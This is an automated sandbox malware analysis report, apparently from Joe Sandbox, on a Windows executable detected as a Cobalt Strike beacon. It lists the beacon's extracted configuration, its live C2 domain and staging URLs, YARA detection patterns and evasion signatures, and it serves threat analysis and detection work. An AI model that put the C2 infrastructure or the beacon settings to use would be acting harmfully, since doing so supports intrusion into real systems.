Edit tour

Windows Analysis Report
O6O7O5REot.exe

Overview

General Information

Sample name:	O6O7O5REot.exe renamed because original name is a hash value
Original sample name:	88b89cfbfb1acd45472205f4cca9013ace78f1ef97c0a3007f4604904d32fb73.exe
Analysis ID:	1535737
MD5:	eef4506fa429532fdb0f3648e3971b2a
SHA1:	8cf591e0997959f8a8df76fa12e6b0f6747c6b9c
SHA256:	88b89cfbfb1acd45472205f4cca9013ace78f1ef97c0a3007f4604904d32fb73
Tags:	exeimg-bilibili-buzzuser-JAMESWT_MHT
Infos:

Detection

CobaltStrike

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Detected potential crypto function

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

O6O7O5REot.exe (PID: 3324 cmdline: "C:\Users\user\Desktop\O6O7O5REot.exe" MD5: EEF4506FA429532FDB0F3648E3971B2A)

conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 5620 cmdline: C:\Windows\system32\WerFault.exe -u -p 3324 -s 560 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 2096, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "MaxDNS": "Not Found", "C2Server": "img.bilibili.buzz,/jquery-3.3.1.min.js", "UserAgent": "Not Found", "HttpPostUri": "Not Found", "Malleable_C2_Instructions": "Not Found", "HttpGet_Metadata": "Not Found", "HttpPost_Metadata": "Not Found", "PipeName": "Not Found", "DNS_Idle": "Not Found", "DNS_Sleep": "Not Found", "SSH_Host": "Not Found", "SSH_Port": "Not Found", "SSH_Username": "Not Found", "SSH_Password_Plaintext": "Not Found", "SSH_Password_Pubkey": "Not Found", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Config": "Not Found", "Proxy_User": "Not Found", "Proxy_Password": "Not Found", "Proxy_Behavior": "Not Found", "Watermark": 100000000, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": "Not Found", "bProcInject_StartRWX": "Not Found", "bProcInject_UseRWX": "Not Found", "bProcInject_MinAllocSize": "Not Found", "ProcInject_PrependAppend_x86": "Not Found", "ProcInject_PrependAppend_x64": "Not Found", "ProcInject_Execute": "Not Found", "ProcInject_AllocationMethod": "Not Found", "bUsesCookies": "Not Found", "HostHeader": "Not Found"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x187e4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0xfd75:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03 0xff0d:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.1857226561.000001EA82D50000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.1857226561.000001EA82D50000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16563:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x177f4:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000003.1451999701.000001EA84640000.00000010.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000003.1451999701.000001EA84640000.00000010.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x164e3:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x17774:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
Process Memory Space: O6O7O5REot.exe PID: 3324	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Click to see the 3 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1857226561.000001EA82D50000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 2096, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "MaxDNS": "Not Found", "C2Server": "img.bilibili.buzz,/jquery-3.3.1.min.js", "UserAgent": "Not Found", "HttpPostUri": "Not Found", "Malleable_C2_Instructions": "Not Found", "HttpGet_Metadata": "Not Found", "HttpPost_Metadata": "Not Found", "PipeName": "Not Found", "DNS_Idle": "Not Found", "DNS_Sleep": "Not Found", "SSH_Host": "Not Found", "SSH_Port": "Not Found", "SSH_Username": "Not Found", "SSH_Password_Plaintext": "Not Found", "SSH_Password_Pubkey": "Not Found", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Config": "Not Found", "Proxy_User": "Not Found", "Proxy_Password": "Not Found", "Proxy_Behavior": "Not Found", "Watermark": 100000000, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": "Not Found", "bProcInject_StartRWX": "Not Found", "bProcInject_UseRWX": "Not Found", "bProcInject_MinAllocSize": "Not Found", "ProcInject_PrependAppend_x86": "Not Found", "ProcInject_PrependAppend_x64": "Not Found", "ProcInject_Execute": "Not Found", "ProcInject_AllocationMethod": "Not Found", "bUsesCookies": "Not Found", "HostHeader": "Not Found"}

Multi AV Scanner detection for submitted file

Source: O6O7O5REot.exe

ReversingLabs: Detection: 18%

Source: O6O7O5REot.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: img.bilibili.buzz

Source: global traffic

HTTP traffic detected: GET /Shorts/1index.jpg HTTP/1.1accept: */*host: intl-web-1305970982.cos.ap-singapore.myqcloud.com

Source: Joe Sandbox View

IP Address: 43.152.64.207 43.152.64.207

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /Shorts/1index.jpg HTTP/1.1accept: */*host: intl-web-1305970982.cos.ap-singapore.myqcloud.com

Source: global traffic	DNS traffic detected: DNS query: intl-web-1305970982.cos.ap-singapore.myqcloud.com
Source: global traffic	DNS traffic detected: DNS query: img.bilibili.buzz

Source: O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.jquery.com/
Source: O6O7O5REot.exe	String found in binary or memory: http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/1.pdfC:
Source: O6O7O5REot.exe	String found in binary or memory: http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/1index.jpg
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C1B000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.bilibili.buzz/
Source: O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.bilibili.buzz/0
Source: O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.bilibili.buzz/8
Source: O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.bilibili.buzz:2096/
Source: O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.bilibili.buzz:2096/(
Source: O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C77000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C47000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C8A000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.js
Source: O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C77000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.jst

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.1857226561.000001EA82D50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000003.1451999701.000001EA84640000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown

Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA8469FC3E	0_2_000001EA8469FC3E
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846AC11C	0_2_000001EA846AC11C
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846B80B0	0_2_000001EA846B80B0
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846AD384	0_2_000001EA846AD384
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA8469FDD6	0_2_000001EA8469FDD6
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846AA708	0_2_000001EA846AA708
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846B7740	0_2_000001EA846B7740
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846A4820	0_2_000001EA846A4820
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846AC888	0_2_000001EA846AC888

Source: C:\Users\user\Desktop\O6O7O5REot.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3324 -s 560

Source: O6O7O5REot.exe

Static PE information: Number of sections : 22 > 10

Source: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.1857226561.000001EA82D50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.1451999701.000001EA84640000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13

Source: O6O7O5REot.exe

Static PE information: Section: .rsrc ZLIB complexity 0.9930606617647059

Source: O6O7O5REot.exe	Binary string: AfdPollInfo\Device\Afd\Mio
Source: O6O7O5REot.exe	Binary string: Failed to open \Device\Afd\Mio:

Source: classification engine

Classification label: mal80.troj.evad.winEXE@3/5@2/1

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3032:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3324

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\02b4575a-c89b-494b-bcd0-2d16b234c8f7

Jump to behavior

Source: O6O7O5REot.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\O6O7O5REot.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: O6O7O5REot.exe

ReversingLabs: Detection: 18%

Source: O6O7O5REot.exe

String found in binary or memory: /load_hpack; header malformed -- pseudo not at head of block`

Source: unknown	Process created: C:\Users\user\Desktop\O6O7O5REot.exe "C:\Users\user\Desktop\O6O7O5REot.exe"
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3324 -s 560

Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\O6O7O5REot.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: O6O7O5REot.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: O6O7O5REot.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: O6O7O5REot.exe

Static file information: File size 8199168 > 1048576

Source: O6O7O5REot.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2a2400
Source: O6O7O5REot.exe	Static PE information: Raw size of /86 is bigger than: 0x100000 < 0x151200

Source: O6O7O5REot.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: O6O7O5REot.exe

Static PE information: real checksum: 0x985d5a should be: 0x7dc41f

Source: O6O7O5REot.exe	Static PE information: section name: .xdata
Source: O6O7O5REot.exe	Static PE information: section name: /4
Source: O6O7O5REot.exe	Static PE information: section name: /19
Source: O6O7O5REot.exe	Static PE information: section name: /35
Source: O6O7O5REot.exe	Static PE information: section name: /47
Source: O6O7O5REot.exe	Static PE information: section name: /61
Source: O6O7O5REot.exe	Static PE information: section name: /73
Source: O6O7O5REot.exe	Static PE information: section name: /86
Source: O6O7O5REot.exe	Static PE information: section name: /97
Source: O6O7O5REot.exe	Static PE information: section name: /113
Source: O6O7O5REot.exe	Static PE information: section name: /127
Source: O6O7O5REot.exe	Static PE information: section name: /143

Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA84647900 push ecx; ret	0_3_000001EA8464791E
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA8464416D push esi; ret	0_3_000001EA84644172
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA84646265 push ebp; ret	0_3_000001EA84646269
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA846472F1 push esp; ret	0_3_000001EA84647322
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA84645AF5 push edx; ret	0_3_000001EA84645ABE
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA846472CE push ebx; ret	0_3_000001EA846472EE
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA84644ACF push esp; ret	0_3_000001EA84644AD8
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA846403A0 push ebx; ret	0_3_000001EA846403A6
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA84644C06 push esi; ret	0_3_000001EA84644C0F
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA8464849E push ebp; ret	0_3_000001EA846484A5
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA8464846F push es; ret	0_3_000001EA84648476
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA84644486 push edx; ret	0_3_000001EA8464449E
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA84645E20 push ecx; ret	0_3_000001EA84645E33
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA8464678C push ebx; ret	0_3_000001EA8464679A
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA8464579B push eax; ret	0_3_000001EA846457AA
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA8464672C push ebx; ret	0_3_000001EA8464679A
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_3_000001EA846457C9 push eax; ret	0_3_000001EA846457AA
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846A6A40 push cs; ret	0_2_000001EA846A6A4B
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA8469935D push edi; iretd	0_2_000001EA8469935E
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846B5C04 push ebp; iretd	0_2_000001EA846B5C05
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846B5BDB push ebp; iretd	0_2_000001EA846B5BDC
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA846B5BBB push ebp; iretd	0_2_000001EA846B5BBC
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA8469AD58 push ebp; iretd	0_2_000001EA8469AD59
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Code function: 0_2_000001EA8469971E push cs; retf	0_2_000001EA8469971F

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
